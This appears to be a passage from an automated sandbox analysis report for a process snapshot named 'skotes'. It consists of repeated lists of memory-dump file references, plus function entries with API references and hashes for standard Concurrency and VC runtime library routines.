Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: c043043f568a9362ec302967fae5d831350c5bb7b9160ab776bb542027a0c3de
Instruction ID: edabf576b618e90c507ad9a28aa6bfe8fcb00e8af22a6c6fe90dc12b06b0a782
Opcode Fuzzy Hash: c043043f568a9362ec302967fae5d831350c5bb7b9160ab776bb542027a0c3de
Instruction Fuzzy Hash: 47719D38904249AFDF15DF54C891BFEBBB5AF46304F044098EC526B292C7319EA6FB61

Function 00C02832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00C02876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00C028DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00C02913

Part of subcall function 00C007ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00C0080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00C02993
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00C029DB

Part of subcall function 00C007C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00C007DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00C029EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00C02A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00C02A4D
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00C02A7E

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
String ID:
API String ID: 1321587334-0
Opcode ID: 772c0c76559214a52eb5cb0df6e40a7b6d682ed33ee81293a7e01dc3cb3e8077
Instruction ID: 75001f7c50efb50d7465325a20a1b279f611ad90e2a78bad0d40f9a5d789516a
Opcode Fuzzy Hash: 772c0c76559214a52eb5cb0df6e40a7b6d682ed33ee81293a7e01dc3cb3e8077
Instruction Fuzzy Hash: AA81DE35B006169FCB18DFA9D898BADB7B1FB49304B25402DE455E72D2DB30AE41DB90

Function 00C069DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00C06A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00C06A51
List.LIBCONCRT ref: 00C06A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00C06A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00C06AB9
List.LIBCONCRT ref: 00C06AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00C06B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C06B20
List.LIBCONCRT ref: 00C06B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00C06B68

Part of subcall function 00C05EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C05EF7
Part of subcall function 00C05EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C05F09

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction ID: 6abea6320c08a2b59079219fa2491367c30035b791c9c9bb4c73eb2ee44c9b3a
Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction Fuzzy Hash: E6515170A00219AFDF08EF94C495BEEB3A8FF08304F044169E915AB2C2DB34AE55DF90

Function 00C152A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00C153A0
type_info::operator==.LIBVCRUNTIME ref: 00C153C7
___TypeMatch.LIBVCRUNTIME ref: 00C154D3
IsInExceptionSpec.LIBVCRUNTIME ref: 00C155AE
CallUnexpected.LIBVCRUNTIME ref: 00C15650

Strings

csm, xrefs: 00C1534D
csm, xrefs: 00C152E0
csm, xrefs: 00C153FE

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 4162181273-393685449
Opcode ID: 6878b8c9bdcbd348e27c96897c9f98177b6d721ffdb84f2e12ad65439bb5cba4
Instruction ID: d084d4b8bb7b13d1ff698bf3d6196338531f40adb0f4c0ee359ebc90c3b2556c
Opcode Fuzzy Hash: 6878b8c9bdcbd348e27c96897c9f98177b6d721ffdb84f2e12ad65439bb5cba4
Instruction Fuzzy Hash: 6EC19C71900609DFCF29DF94C8809EEBBB6FF96311F50415AF8216B212C771DA92EB91

Function 00C07364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00C073B0
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00C073F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00C0740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00C07419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C07440

Strings

ppVirtualProcessorRoots, xrefs: 00C07438
count, xrefs: 00C0737E

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3897347962-3650809737
Opcode ID: 724d7cfd6d04210c155a8c779c21c1497fd8e875e7f7a4020c75dcdecf935eb9
Instruction ID: 3f9585432abd00e036e710a8efebda9b49a262f6ae173bf260d37f7b85e09518
Opcode Fuzzy Hash: 724d7cfd6d04210c155a8c779c21c1497fd8e875e7f7a4020c75dcdecf935eb9
Instruction Fuzzy Hash: C5217E34E00209AFCB14EFA9C495AADBBB5BF09300F1441A9E911A73A1CB30AE05DF90

Function 00C078E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00C07903

Part of subcall function 00C05CB8: __EH_prolog3_catch.LIBCMT ref: 00C05CBF
Part of subcall function 00C05CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00C05CF8

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00C0792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00C07936

Part of subcall function 00C05CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00C05D70
Part of subcall function 00C05CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00C05D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00C07982
Concurrency::location::_Assign.LIBCMT ref: 00C079A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00C079AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00C079BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00C079ED

Part of subcall function 00C0691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00C06942
Part of subcall function 00C0691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00C06965

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
